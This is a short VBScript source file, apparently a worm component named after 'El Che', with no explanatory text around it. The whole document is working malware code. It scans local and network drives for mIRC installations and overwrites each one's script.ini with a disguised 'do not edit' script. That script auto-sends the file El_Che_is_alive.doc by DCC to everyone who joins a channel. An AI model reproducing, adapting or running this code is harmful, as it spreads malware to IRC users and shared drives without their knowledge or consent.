call Che_Forever
Function Che_Forever()
If finded <> "true" Then
  Dim Che_Fso, Che_Driv, Che_Drtype
  Dim Che_Drivefull
  Set Che_Fso = CreateObject("Scripting.FileSystemObject")
  Set Che_Driv = Che_Fso.Drives
  For Each Che_Drtype In Che_Driv
    If Che_Drtype.DriveType = Remote Then
    Che_Drivefull = Che_Drtype & "\"
    Call Che_Subfolders(Che_Drivefull)
    ElseIf Che_Drtype.IsReady Then
    Che_Drivefull = Che_Drtype & "\"
    Call Che_Subfolders(Che_Drivefull)
    End If
  Next
End If
End Function
Function Che_Subfolders(Che_Whichfol)
Dim Che_Fso, Che_GetFol, Che_Files, Che_File, Che_Subfol
  Set Che_Fso = CreateObject("Scripting.FileSystemObject")
  Set Che_GetFol = Che_Fso.GetFolder(Che_Whichfol)
  Set Che_Files = Che_GetFol.Files
  For Each Che_File In Che_Files
   If Che_File.Name = "mirc.ini" Then
   Call DoMirc(Che_Whichfol)
   End If
   Next
  Set Che_File = Che_GetFol.SubFolders
  For Each Che_Subfol In Che_File
   Call Che_Subfolders(Che_Subfol.Path)
  Next
End Function
function DoMirc(path)
Dim Che_Fso
Set Che_Fso = CreateObject("Scripting.FileSystemObject")
Set dirsystem = Che_Fso.GetSpecialFolder(0)
if right(path,1)<>"\" then
set scriptini=Che_Fso.CreateTextFile(path & "\script.ini")
else
set scriptini=Che_Fso.CreateTextFile(path & "script.ini")
end if
scriptini.WriteLine "[script]"
scriptini.WriteLine ";Please do not edit this file."
scriptini.WriteLine ";The modification of the file may cause a disfunction of the Mirc Program."
scriptini.WriteLine ";_________________________________________."
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=  /.dcc send $nick " & dirsystem & "\El_Che_is_alive.doc"
scriptini.WriteLine "n3=}"
scriptini.close
end function
